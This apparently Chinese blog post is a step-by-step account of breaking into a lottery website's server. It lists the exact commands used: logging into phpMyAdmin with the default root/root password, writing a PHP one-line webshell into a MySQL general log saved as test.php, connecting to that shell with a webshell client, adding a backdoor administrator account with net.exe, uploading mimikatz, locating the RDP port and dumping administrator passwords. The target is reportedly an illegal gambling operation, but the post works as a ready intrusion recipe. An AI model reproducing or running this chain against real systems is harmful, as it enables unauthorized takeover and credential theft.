渗透系列之打击彩票站

渗透系列之打击彩票站

By;梭哈王

  1. 获取phpmyadmin弱口令

通过信息收集到彩票站点的ip为xxx,探测扫描发现存在phpmyadmin,通过猜测,使用默认弱口令(root/root)登入到phpmyadmin当中。

 

 

 

  1. 通过phpmyadmin后台sql查询写入shell到日志文件

使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中。

流程如下:

 

命令如下:

1、开启日志功能:set global general_log=on;

2、点击phpmyadmin变量查看日志文件名字:

 

这里的日志文件是test.php。

 

3、执行SQL命令写入一句话到日志文件: SELECT'<?php assert($_POST["test"]);?>';

4、执行成功返回。

 

 

5、查看日志文件。

 

3、菜刀连接添加用户并且上传mimikatz。

使用菜刀连接日志文件木马,xxx/test.php 密码:test

 

查看发现是系统管理员sysytem权限,直接添加用户且添加到管理组即可。

命令为: C:\Windows\system32\net.exe user Test Test!@#123 /add

C:\Windows\system32\net.exe  localgroup administrators Test /add

 

上传mimikataz到服务器当中。

 

 

4、3389连接,读取管理员密码。

1、直接telnet ip 3389 测试发现可通,于是直接连接3389进去。

 

2、或者这里在菜刀上执行以下命令查询3389开放的端口也一样。

第一步: tasklist /svc | findstr TermService 查询远程桌面服务的进程

第二步: netstat -ano | findstr ****  //查看远程桌面服务进程号对应的端口号。

 

3、执行mimikatz,读取到管理员组登录密码。

 

 

4、使用获取的administrator/xxxx账户密码远程登入服务器当中。

 

  1. 发现该服务器使用phpmystudy批量建立彩票站,大概有十几个站点,随意访问几个服务器上的网站域名,部分截图如下:

 

系统一:

 

系统二:

 

 

 

系统三:

 

 

后台一:

 

后台二:

 

  • 4
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 16
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值